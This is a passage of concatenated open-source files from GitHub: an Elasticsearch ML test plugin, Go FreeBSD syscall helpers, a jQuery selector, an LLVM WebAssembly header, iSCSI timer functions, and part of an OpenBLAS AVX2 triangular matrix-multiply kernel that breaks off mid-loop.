import org.elasticsearch.xpack.core.LocalStateCompositeXPackPlugin;
import org.elasticsearch.xpack.core.rollup.action.GetRollupIndexCapsAction;
import org.elasticsearch.xpack.core.ssl.SSLService;
import org.elasticsearch.xpack.monitoring.Monitoring;
import org.elasticsearch.xpack.security.Security;
import java.nio.file.Path;
import java.util.Collections;
import java.util.HashSet;
import java.util.List;
import static org.elasticsearch.xpack.ml.MachineLearning.TRAINED_MODEL_CIRCUIT_BREAKER_NAME;
public class LocalStateMachineLearning extends LocalStateCompositeXPackPlugin {
public LocalStateMachineLearning(final Settings settings, final Path configPath) throws Exception {
super(settings, configPath);
LocalStateMachineLearning thisVar = this;
MachineLearning plugin = new MachineLearning(settings, configPath){
@Override
protected XPackLicenseState getLicenseState() {
return thisVar.getLicenseState();
}
};
plugin.setCircuitBreaker(new NoopCircuitBreaker(TRAINED_MODEL_CIRCUIT_BREAKER_NAME));
plugins.add(plugin);
plugins.add(new Monitoring(settings) {
@Override
protected SSLService getSslService() {
return thisVar.getSslService();
}
@Override
protected LicenseService getLicenseService() {
return thisVar.getLicenseService();
}
@Override
protected XPackLicenseState getLicenseState() {
return thisVar.getLicenseState();
}
});
plugins.add(new Security(settings, configPath) {
@Override
protected SSLService getSslService() { return thisVar.getSslService(); }
@Override
protected XPackLicenseState getLicenseState() { return thisVar.getLicenseState(); }
});
plugins.add(new MockedRollupPlugin());
}
/**
* This is only required as we now have to have the GetRollupIndexCapsAction as a valid action in our node.
* The MachineLearningLicenseTests attempt to create a datafeed referencing this LocalStateMachineLearning object.
* Consequently, we need to be able to take this rollup action (response does not matter)
* as the datafeed extractor now depends on it.
*/
public static class MockedRollupPlugin extends Plugin implements ActionPlugin {
@Override
public List<ActionHandler<? extends ActionRequest, ? extends ActionResponse>> getActions() {
return Collections.singletonList(
new ActionHandler<>(GetRollupIndexCapsAction.INSTANCE, MockedRollupIndexCapsTransport.class)
);
}
public static class MockedRollupIndexCapsTransport
extends TransportAction<GetRollupIndexCapsAction.Request, GetRollupIndexCapsAction.Response> {
@Inject
public MockedRollupIndexCapsTransport(TransportService transportService) {
super(GetRollupIndexCapsAction.NAME, new ActionFilters(new HashSet<>()), transportService.getTaskManager());
}
@Override
protected void doExecute(Task task,
GetRollupIndexCapsAction.Request request,
ActionListener<GetRollupIndexCapsAction.Response> listener) {
listener.onResponse(new GetRollupIndexCapsAction.Response());
}
}
}
}
| {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build amd64,freebsd
package unix
import (
"syscall"
"unsafe"
)
func Getpagesize() int { return 4096 }
func TimespecToNsec(ts Timespec) int64 { return int64(ts.Sec)*1e9 + int64(ts.Nsec) }
func NsecToTimespec(nsec int64) (ts Timespec) {
ts.Sec = nsec / 1e9
ts.Nsec = nsec % 1e9
return
}
func NsecToTimeval(nsec int64) (tv Timeval) {
nsec += 999 // round up to microsecond
tv.Usec = nsec % 1e9 / 1e3
tv.Sec = int64(nsec / 1e9)
return
}
func SetKevent(k *Kevent_t, fd, mode, flags int) {
k.Ident = uint64(fd)
k.Filter = int16(mode)
k.Flags = uint16(flags)
}
func (iov *Iovec) SetLen(length int) {
iov.Len = uint64(length)
}
func (msghdr *Msghdr) SetControllen(length int) {
msghdr.Controllen = uint32(length)
}
func (cmsg *Cmsghdr) SetLen(length int) {
cmsg.Len = uint32(length)
}
func sendfile(outfd int, infd int, offset *int64, count int) (written int, err error) {
var writtenOut uint64 = 0
_, _, e1 := Syscall9(SYS_SENDFILE, uintptr(infd), uintptr(outfd), uintptr(*offset), uintptr(count), 0, uintptr(unsafe.Pointer(&writtenOut)), 0, 0, 0)
written = int(writtenOut)
if e1 != 0 {
err = e1
}
return
}
func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 uintptr, err syscall.Errno)
| {
"pile_set_name": "Github"
} |
var $ = require('jquery');
$.expr[":"].icontains = $.expr.createPseudo(function (arg) {
return function (elem) {
return $(elem).text().toUpperCase().indexOf(arg.toUpperCase()) >= 0;
};
});
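// Example (hypothetical) usage of the ":icontains" selector defined above:
// it matches elements whose text contains the argument, ignoring case, e.g.
// $("li:icontains('hello')").addClass("match");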
| {
"pile_set_name": "Github"
} |
//===-- WebAssemblyMCInstLower.h - Lower MachineInstr to MCInst -*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
///
/// \file
/// This file declares the class to lower WebAssembly MachineInstrs to
/// their corresponding MCInst records.
///
//===----------------------------------------------------------------------===//
#ifndef LLVM_LIB_TARGET_WEBASSEMBLY_WEBASSEMBLYMCINSTLOWER_H
#define LLVM_LIB_TARGET_WEBASSEMBLY_WEBASSEMBLYMCINSTLOWER_H
#include "llvm/MC/MCInst.h"
#include "llvm/Support/Compiler.h"
namespace llvm {
class WebAssemblyAsmPrinter;
class MCContext;
class MCSymbol;
class MachineInstr;
class MachineOperand;
/// This class is used to lower an MachineInstr into an MCInst.
class LLVM_LIBRARY_VISIBILITY WebAssemblyMCInstLower {
MCContext &Ctx;
WebAssemblyAsmPrinter &Printer;
MCSymbol *GetGlobalAddressSymbol(const MachineOperand &MO) const;
MCSymbol *GetExternalSymbolSymbol(const MachineOperand &MO) const;
MCOperand lowerSymbolOperand(const MachineOperand &MO, MCSymbol *Sym) const;
public:
WebAssemblyMCInstLower(MCContext &ctx, WebAssemblyAsmPrinter &printer)
: Ctx(ctx), Printer(printer) {}
void lower(const MachineInstr *MI, MCInst &OutMI) const;
};
} // end namespace llvm
#endif
| {
"pile_set_name": "Github"
} |
/*
* iSCSI timer
*
* Copyright (C) 2002 Cisco Systems, Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published
* by the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* See the file COPYING included with this distribution for more details.
*/
#include <string.h>
#include <sys/time.h>
void iscsi_timer_clear(struct timeval *timer)
{
memset(timer, 0, sizeof (*timer));
}
/* set timer to now + seconds */
void iscsi_timer_set(struct timeval *timer, int seconds)
{
if (timer) {
memset(timer, 0, sizeof (*timer));
gettimeofday(timer, NULL);
timer->tv_sec += seconds;
}
}
int iscsi_timer_expired(struct timeval *timer)
{
struct timeval now;
/* no timer, can't have expired */
if ((timer == NULL) || ((timer->tv_sec == 0) && (timer->tv_usec == 0)))
return 0;
memset(&now, 0, sizeof (now));
gettimeofday(&now, NULL);
if (now.tv_sec > timer->tv_sec)
return 1;
if ((now.tv_sec == timer->tv_sec) && (now.tv_usec >= timer->tv_usec))
return 1;
return 0;
}
int iscsi_timer_msecs_until(struct timeval *timer)
{
struct timeval now;
int msecs;
long partial;
/* no timer, can't have expired, infinite time til it expires */
if ((timer == NULL) || ((timer->tv_sec == 0) && (timer->tv_usec == 0)))
return -1;
memset(&now, 0, sizeof (now));
gettimeofday(&now, NULL);
/* already expired? */
if (now.tv_sec > timer->tv_sec)
return 0;
if ((now.tv_sec == timer->tv_sec) && (now.tv_usec >= timer->tv_usec))
return 0;
/* not expired yet, do the math */
partial = timer->tv_usec - now.tv_usec;
if (partial < 0) {
partial += 1000 * 1000;
msecs = (partial + 500) / 1000;
msecs += (timer->tv_sec - now.tv_sec - 1) * 1000;
} else {
msecs = (partial + 500) / 1000;
msecs += (timer->tv_sec - now.tv_sec) * 1000;
}
return msecs;
}
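/*
* Example (hypothetical) usage of the helpers above: arm a 30 second timer
* and poll it until it expires.
*
* struct timeval login_timer;
* iscsi_timer_set(&login_timer, 30);
* while (!iscsi_timer_expired(&login_timer)) {
* int remaining = iscsi_timer_msecs_until(&login_timer);
* // sleep or poll for up to 'remaining' milliseconds
* }
*/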
| {
"pile_set_name": "Github"
} |
#include "common.h"
#include <stdbool.h>
static void dtrmm_kernel_4x8( BLASLONG n, FLOAT *alpha ,FLOAT *a, FLOAT *b, FLOAT *C0, FLOAT *C1, FLOAT *C2,FLOAT *C3, FLOAT *C4, FLOAT *C5,FLOAT *C6, FLOAT *C7) __attribute__ ((noinline));
static void dtrmm_kernel_4x8( BLASLONG n, FLOAT *alpha ,FLOAT *a, FLOAT *b, FLOAT *C0, FLOAT *C1, FLOAT *C2,FLOAT *C3, FLOAT *C4, FLOAT *C5,FLOAT *C6, FLOAT *C7)
{
BLASLONG i = 0;
BLASLONG temp1 = n * 8;
__asm__ __volatile__
(
" vxorpd %%ymm4 , %%ymm4 , %%ymm4 \n\t"
" vxorpd %%ymm5 , %%ymm5 , %%ymm5 \n\t"
" vxorpd %%ymm6 , %%ymm6 , %%ymm6 \n\t"
" vxorpd %%ymm7 , %%ymm7 , %%ymm7 \n\t"
" vxorpd %%ymm8 , %%ymm8 , %%ymm8 \n\t"
" vxorpd %%ymm9 , %%ymm9 , %%ymm9 \n\t"
" vxorpd %%ymm10, %%ymm10, %%ymm10 \n\t"
" vxorpd %%ymm11, %%ymm11, %%ymm11 \n\t"
" cmp $0, %1 \n\t"
" jz 2f \n\t"
" .p2align 4 \n\t"
"1: \n\t"
" vmovups (%2,%0,4) , %%ymm0 \n\t"
" vmovups (%3,%0,8) , %%ymm1 \n\t"
" vmovups 32(%3,%0,8) , %%ymm2 \n\t"
" vfmadd231pd %%ymm0 , %%ymm1 , %%ymm4 \n\t"
" vfmadd231pd %%ymm0 , %%ymm2 , %%ymm8 \n\t"
" vpermilpd $0x05 , %%ymm0 , %%ymm0 \n\t"
" vfmadd231pd %%ymm0 , %%ymm1 , %%ymm5 \n\t"
" vfmadd231pd %%ymm0 , %%ymm2 , %%ymm9 \n\t"
" vpermpd $0x1b , %%ymm0 , %%ymm0 \n\t"
" vfmadd231pd %%ymm0 , %%ymm1 , %%ymm6 \n\t"
" vfmadd231pd %%ymm0 , %%ymm2 , %%ymm10 \n\t"
" vpermilpd $0x05 , %%ymm0 , %%ymm0 \n\t"
" vfmadd231pd %%ymm0 , %%ymm1 , %%ymm7 \n\t"
" vfmadd231pd %%ymm0 , %%ymm2 , %%ymm11 \n\t"
" addq $8 , %0 \n\t"
" cmp %0 , %1 \n\t"
" jne 1b \n\t"
"2: \n\t"
" vbroadcastsd (%4), %%ymm0 \n\t"
" vmulpd %%ymm0 , %%ymm4 , %%ymm4 \n\t"
" vmulpd %%ymm0 , %%ymm5 , %%ymm5 \n\t"
" vmulpd %%ymm0 , %%ymm6 , %%ymm6 \n\t"
" vmulpd %%ymm0 , %%ymm7 , %%ymm7 \n\t"
" vmulpd %%ymm0 , %%ymm8 , %%ymm8 \n\t"
" vmulpd %%ymm0 , %%ymm9 , %%ymm9 \n\t"
" vmulpd %%ymm0 , %%ymm10, %%ymm10 \n\t"
" vmulpd %%ymm0 , %%ymm11, %%ymm11 \n\t"
" vpermilpd $0x05 , %%ymm5 , %%ymm5 \n\t"
" vpermilpd $0x05 , %%ymm7 , %%ymm7 \n\t"
" vblendpd $0x0a , %%ymm5 , %%ymm4 , %%ymm0 \n\t"
" vblendpd $0x05 , %%ymm5 , %%ymm4 , %%ymm1 \n\t"
" vblendpd $0x0a , %%ymm7 , %%ymm6 , %%ymm2 \n\t"
" vblendpd $0x05 , %%ymm7 , %%ymm6 , %%ymm3 \n\t"
" vperm2f128 $0x01 , %%ymm2 , %%ymm2 , %%ymm2 \n\t"
" vperm2f128 $0x01 , %%ymm3 , %%ymm3 , %%ymm3 \n\t"
" vblendpd $0x03 , %%ymm0 , %%ymm2 , %%ymm4 \n\t"
" vblendpd $0x03 , %%ymm1 , %%ymm3 , %%ymm5 \n\t"
" vblendpd $0x03 , %%ymm2 , %%ymm0 , %%ymm6 \n\t"
" vblendpd $0x03 , %%ymm3 , %%ymm1 , %%ymm7 \n\t"
" vmovups %%ymm4 , (%5) \n\t"
" vmovups %%ymm5 , (%6) \n\t"
" vmovups %%ymm6 , (%7) \n\t"
" vmovups %%ymm7 , (%8) \n\t"
" vpermilpd $0x05 , %%ymm9 , %%ymm9 \n\t"
" vpermilpd $0x05 , %%ymm11, %%ymm11 \n\t"
" vblendpd $0x0a , %%ymm9 , %%ymm8 , %%ymm0 \n\t"
" vblendpd $0x05 , %%ymm9 , %%ymm8 , %%ymm1 \n\t"
" vblendpd $0x0a , %%ymm11, %%ymm10, %%ymm2 \n\t"
" vblendpd $0x05 , %%ymm11, %%ymm10, %%ymm3 \n\t"
" vperm2f128 $0x01 , %%ymm2 , %%ymm2 , %%ymm2 \n\t"
" vperm2f128 $0x01 , %%ymm3 , %%ymm3 , %%ymm3 \n\t"
" vblendpd $0x03 , %%ymm0 , %%ymm2 , %%ymm4 \n\t"
" vblendpd $0x03 , %%ymm1 , %%ymm3 , %%ymm5 \n\t"
" vblendpd $0x03 , %%ymm2 , %%ymm0 , %%ymm6 \n\t"
" vblendpd $0x03 , %%ymm3 , %%ymm1 , %%ymm7 \n\t"
" vmovups %%ymm4 , (%9) \n\t"
" vmovups %%ymm5 , (%10) \n\t"
" vmovups %%ymm6 , (%11) \n\t"
" vmovups %%ymm7 , (%12) \n\t"
:
:
"a" (i), // 0
"r" (temp1), // 1
"S" (a), // 2
"D" (b), // 3
"r" (alpha), // 4
"r" (C0), // 5
"r" (C1), // 6
"r" (C2), // 7
"r" (C3), // 8
"r" (C4), // 9
"r" (C5), // 10
"r" (C6), // 11
"r" (C7) // 12
: "cc",
"%xmm0", "%xmm1", "%xmm2", "%xmm3",
"%xmm4", "%xmm5", "%xmm6", "%xmm7",
"%xmm8", "%xmm9", "%xmm10", "%xmm11",
"%xmm12", "%xmm13", "%xmm14", "%xmm15",
"memory"
);
}
int CNAME(BLASLONG bm,BLASLONG bn,BLASLONG bk,FLOAT alpha,FLOAT* ba,FLOAT* bb,FLOAT* C,BLASLONG ldc ,BLASLONG offset)
{
BLASLONG i,j,k;
FLOAT *C0,*C1,*C2,*C3,*C4,*C5,*C6,*C7,*ptrba,*ptrbb;
FLOAT res0_0;
FLOAT res0_1;
FLOAT res0_2;
FLOAT res0_3;
FLOAT res1_0;
FLOAT res1_1;
FLOAT res1_2;
FLOAT res1_3;
FLOAT res2_0;
FLOAT res2_1;
FLOAT res2_2;
FLOAT res2_3;
FLOAT res3_0;
FLOAT res3_1;
FLOAT res3_2;
FLOAT res3_3;
FLOAT res4_0;
FLOAT res4_1;
/*
FLOAT res4_2;
FLOAT res4_3;
*/
FLOAT res5_0;
FLOAT res5_1;
/*
FLOAT res5_2;
FLOAT res5_3;
*/
FLOAT res6_0;
FLOAT res6_1;
/*
FLOAT res6_2;
FLOAT res6_3;
*/
FLOAT res7_0;
FLOAT res7_1;
/*
FLOAT res7_2;
FLOAT res7_3;
*/
FLOAT a0;
FLOAT a1;
FLOAT b0;
FLOAT b1;
FLOAT b2;
FLOAT b3;
FLOAT b4;
FLOAT b5;
FLOAT b6;
FLOAT b7;
BLASLONG off, temp ;
bool left;
bool transposed;
bool backwards;
#ifdef LEFT
left = true;
#else
left = false;
#endif
#ifdef TRANSA
transposed = true;
#else
transposed = false;
#endif
backwards = left != transposed;
if (!left) {
off = -offset;
}
for (j=0; j<bn/8; j+=1) // do blocks of the Mx8 loops
{
C0 = C;
C1 = C0+ldc;
C2 = C1+ldc;
C3 = C2+ldc;
C4 = C3+ldc;
C5 = C4+ldc;
C6 = C5+ldc;
C7 = C6+ldc;
if (left) {
off = offset;
}
ptrba = ba;
for (i=0; i<bm/4; i+=1) // do blocks of 4x4
{
ptrbb = bb;
if (backwards)
{
ptrba += off*4; // number of values in A
ptrbb += off*8; // number of values in B
}
/*
res0_0 = 0;
res0_1 = 0;
res0_2 = 0;
res0_3 = 0;
res1_0 = 0;
res1_1 = 0;
res1_2 = 0;
res1_3 = 0;
res2_0 = 0;
res2_1 = 0;
res2_2 = 0;
res2_3 = 0;
res3_0 = 0;
res3_1 = 0;
res3_2 = 0;
res3_3 = 0;
res4_0 = 0;
res4_1 = 0;
res4_2 = 0;
res4_3 = 0;
res5_0 = 0;
res5_1 = 0;
res5_2 = 0;
res5_3 = 0;
res6_0 = 0;
res6_1 = 0;
res6_2 = 0;
res6_3 = 0;
res7_0 = 0;
res7_1 = 0;
res7_2 = 0;
res7_3 = 0;
*/
temp = backwards ? bk-off :
left ? off + 4 : // number of values in A
off + 8; // number of values in B
dtrmm_kernel_4x8( temp, &alpha , ptrba, ptrbb, C0, C1, C2, C3, C4, C5, C6, C7);
ptrba = ptrba + temp * 4;
ptrbb = ptrbb + temp * 8;
/*
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
b4 = ptrbb[4];
b5 = ptrbb[5];
b6 = ptrbb[6];
b7 = ptrbb[7];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
res4_0 += a0*b4;
res5_0 += a0*b5;
res6_0 += a0*b6;
res7_0 += a0*b7;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
res2_1 += a1*b2;
res3_1 += a1*b3;
res4_1 += a1*b4;
res5_1 += a1*b5;
res6_1 += a1*b6;
res7_1 += a1*b7;
a0 = ptrba[2];
res0_2 += a0*b0;
res1_2 += a0*b1;
res2_2 += a0*b2;
res3_2 += a0*b3;
res4_2 += a0*b4;
res5_2 += a0*b5;
res6_2 += a0*b6;
res7_2 += a0*b7;
a1 = ptrba[3];
res0_3 += a1*b0;
res1_3 += a1*b1;
res2_3 += a1*b2;
res3_3 += a1*b3;
res4_3 += a1*b4;
res5_3 += a1*b5;
res6_3 += a1*b6;
res7_3 += a1*b7;
ptrba = ptrba+4;
ptrbb = ptrbb+8;
}
res0_0 *= alpha;
res0_1 *= alpha;
res0_2 *= alpha;
res0_3 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res1_2 *= alpha;
res1_3 *= alpha;
res2_0 *= alpha;
res2_1 *= alpha;
res2_2 *= alpha;
res2_3 *= alpha;
res3_0 *= alpha;
res3_1 *= alpha;
res3_2 *= alpha;
res3_3 *= alpha;
res4_0 *= alpha;
res4_1 *= alpha;
res4_2 *= alpha;
res4_3 *= alpha;
res5_0 *= alpha;
res5_1 *= alpha;
res5_2 *= alpha;
res5_3 *= alpha;
res6_0 *= alpha;
res6_1 *= alpha;
res6_2 *= alpha;
res6_3 *= alpha;
res7_0 *= alpha;
res7_1 *= alpha;
res7_2 *= alpha;
res7_3 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C0[2] = res0_2;
C0[3] = res0_3;
C1[0] = res1_0;
C1[1] = res1_1;
C1[2] = res1_2;
C1[3] = res1_3;
C2[0] = res2_0;
C2[1] = res2_1;
C2[2] = res2_2;
C2[3] = res2_3;
C3[0] = res3_0;
C3[1] = res3_1;
C3[2] = res3_2;
C3[3] = res3_3;
C4[0] = res4_0;
C4[1] = res4_1;
C4[2] = res4_2;
C4[3] = res4_3;
C5[0] = res5_0;
C5[1] = res5_1;
C5[2] = res5_2;
C5[3] = res5_3;
C6[0] = res6_0;
C6[1] = res6_1;
C6[2] = res6_2;
C6[3] = res6_3;
C7[0] = res7_0;
C7[1] = res7_1;
C7[2] = res7_2;
C7[3] = res7_3;
*/
if (!backwards) {
temp = bk-off;
temp = left ? temp - 4 : // number of values in A
temp - 8; // number of values in B
ptrba += temp*4; // number of values in A
ptrbb += temp*8; // number of values in B
}
#ifdef LEFT
off += 4; // number of values in A
#endif
C0 = C0+4;
C1 = C1+4;
C2 = C2+4;
C3 = C3+4;
C4 = C4+4;
C5 = C5+4;
C6 = C6+4;
C7 = C7+4;
}
if ( bm & 2 ) // do any 2x4 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*2;
ptrbb = bb + off*8;
#endif
res0_0 = 0;
res0_1 = 0;
res1_0 = 0;
res1_1 = 0;
res2_0 = 0;
res2_1 = 0;
res3_0 = 0;
res3_1 = 0;
res4_0 = 0;
res4_1 = 0;
res5_0 = 0;
res5_1 = 0;
res6_0 = 0;
res6_1 = 0;
res7_0 = 0;
res7_1 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+2; // number of values in A
#else
temp = off+8; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
b4 = ptrbb[4];
b5 = ptrbb[5];
b6 = ptrbb[6];
b7 = ptrbb[7];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
res4_0 += a0*b4;
res5_0 += a0*b5;
res6_0 += a0*b6;
res7_0 += a0*b7;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
res2_1 += a1*b2;
res3_1 += a1*b3;
res4_1 += a1*b4;
res5_1 += a1*b5;
res6_1 += a1*b6;
res7_1 += a1*b7;
ptrba = ptrba+2;
ptrbb = ptrbb+8;
}
res0_0 *= alpha;
res0_1 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res2_0 *= alpha;
res2_1 *= alpha;
res3_0 *= alpha;
res3_1 *= alpha;
res4_0 *= alpha;
res4_1 *= alpha;
res5_0 *= alpha;
res5_1 *= alpha;
res6_0 *= alpha;
res6_1 *= alpha;
res7_0 *= alpha;
res7_1 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C1[0] = res1_0;
C1[1] = res1_1;
C2[0] = res2_0;
C2[1] = res2_1;
C3[0] = res3_0;
C3[1] = res3_1;
C4[0] = res4_0;
C4[1] = res4_1;
C5[0] = res5_0;
C5[1] = res5_1;
C6[0] = res6_0;
C6[1] = res6_1;
C7[0] = res7_0;
C7[1] = res7_1;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 2; // number of values in A
#else
temp -= 8; // number of values in B
#endif
ptrba += temp*2;
ptrbb += temp*8;
#endif
#ifdef LEFT
off += 2; // number of values in A
#endif
C0 = C0+2;
C1 = C1+2;
C2 = C2+2;
C3 = C3+2;
C4 = C4+2;
C5 = C5+2;
C6 = C6+2;
C7 = C7+2;
}
if ( bm & 1 ) // do any 1x4 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*1;
ptrbb = bb + off*8;
#endif
res0_0 = 0;
res1_0 = 0;
res2_0 = 0;
res3_0 = 0;
res4_0 = 0;
res5_0 = 0;
res6_0 = 0;
res7_0 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+1; // number of values in A
#else
temp = off+8; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
b4 = ptrbb[4];
b5 = ptrbb[5];
b6 = ptrbb[6];
b7 = ptrbb[7];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
res4_0 += a0*b4;
res5_0 += a0*b5;
res6_0 += a0*b6;
res7_0 += a0*b7;
ptrba = ptrba+1;
ptrbb = ptrbb+8;
}
res0_0 *= alpha;
res1_0 *= alpha;
res2_0 *= alpha;
res3_0 *= alpha;
res4_0 *= alpha;
res5_0 *= alpha;
res6_0 *= alpha;
res7_0 *= alpha;
C0[0] = res0_0;
C1[0] = res1_0;
C2[0] = res2_0;
C3[0] = res3_0;
C4[0] = res4_0;
C5[0] = res5_0;
C6[0] = res6_0;
C7[0] = res7_0;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 1; // number of values in A
#else
temp -= 8; // number of values in B
#endif
ptrba += temp*1;
ptrbb += temp*8;
#endif
#ifdef LEFT
off += 1; // number of values in A
#endif
C0 = C0+1;
C1 = C1+1;
C2 = C2+1;
C3 = C3+1;
C4 = C4+1;
C5 = C5+1;
C6 = C6+1;
C7 = C7+1;
}
#if defined(TRMMKERNEL) && !defined(LEFT)
off += 8;
#endif
k = (bk<<3);
bb = bb+k;
i = (ldc<<3);
C = C+i;
}
for (j=0; j<(bn&4); j+=4) // do blocks of the Mx4 loops
{
C0 = C;
C1 = C0+ldc;
C2 = C1+ldc;
C3 = C2+ldc;
if (left) {
off = offset;
}
ptrba = ba;
for (i=0; i<bm/4; i+=1) // do blocks of 4x4
{
ptrbb = bb;
if (backwards)
{
ptrba += off*4; // number of values in A
ptrbb += off*4; // number of values in B
}
res0_0 = 0;
res0_1 = 0;
res0_2 = 0;
res0_3 = 0;
res1_0 = 0;
res1_1 = 0;
res1_2 = 0;
res1_3 = 0;
res2_0 = 0;
res2_1 = 0;
res2_2 = 0;
res2_3 = 0;
res3_0 = 0;
res3_1 = 0;
res3_2 = 0;
res3_3 = 0;
temp = backwards ? bk-off : off + 4;
/* left ? off + 4 : // number of values in A
off + 4; // number of values in B */
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
res2_1 += a1*b2;
res3_1 += a1*b3;
a0 = ptrba[2];
res0_2 += a0*b0;
res1_2 += a0*b1;
res2_2 += a0*b2;
res3_2 += a0*b3;
a1 = ptrba[3];
res0_3 += a1*b0;
res1_3 += a1*b1;
res2_3 += a1*b2;
res3_3 += a1*b3;
ptrba = ptrba+4;
ptrbb = ptrbb+4;
}
res0_0 *= alpha;
res0_1 *= alpha;
res0_2 *= alpha;
res0_3 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res1_2 *= alpha;
res1_3 *= alpha;
res2_0 *= alpha;
res2_1 *= alpha;
res2_2 *= alpha;
res2_3 *= alpha;
res3_0 *= alpha;
res3_1 *= alpha;
res3_2 *= alpha;
res3_3 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C0[2] = res0_2;
C0[3] = res0_3;
C1[0] = res1_0;
C1[1] = res1_1;
C1[2] = res1_2;
C1[3] = res1_3;
C2[0] = res2_0;
C2[1] = res2_1;
C2[2] = res2_2;
C2[3] = res2_3;
C3[0] = res3_0;
C3[1] = res3_1;
C3[2] = res3_2;
C3[3] = res3_3;
if (!backwards) {
temp = bk-off - 4;
/* temp = left ? temp - 4 : // number of values in A
temp - 4; // number of values in B */
ptrba += temp*4; // number of values in A
ptrbb += temp*4; // number of values in B
}
#ifdef LEFT
off += 4; // number of values in A
#endif
C0 = C0+4;
C1 = C1+4;
C2 = C2+4;
C3 = C3+4;
}
if ( bm & 2 ) // do any 2x4 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*2;
ptrbb = bb + off*4;
#endif
res0_0 = 0;
res0_1 = 0;
res1_0 = 0;
res1_1 = 0;
res2_0 = 0;
res2_1 = 0;
res3_0 = 0;
res3_1 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+2; // number of values in A
#else
temp = off+4; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
res2_1 += a1*b2;
res3_1 += a1*b3;
ptrba = ptrba+2;
ptrbb = ptrbb+4;
}
res0_0 *= alpha;
res0_1 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res2_0 *= alpha;
res2_1 *= alpha;
res3_0 *= alpha;
res3_1 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C1[0] = res1_0;
C1[1] = res1_1;
C2[0] = res2_0;
C2[1] = res2_1;
C3[0] = res3_0;
C3[1] = res3_1;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 2; // number of values in A
#else
temp -= 4; // number of values in B
#endif
ptrba += temp*2;
ptrbb += temp*4;
#endif
#ifdef LEFT
off += 2; // number of values in A
#endif
C0 = C0+2;
C1 = C1+2;
C2 = C2+2;
C3 = C3+2;
}
if ( bm & 1 ) // do any 1x4 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*1;
ptrbb = bb + off*4;
#endif
res0_0 = 0;
res1_0 = 0;
res2_0 = 0;
res3_0 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+1; // number of values in A
#else
temp = off+4; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
a0 = ptrba[0];
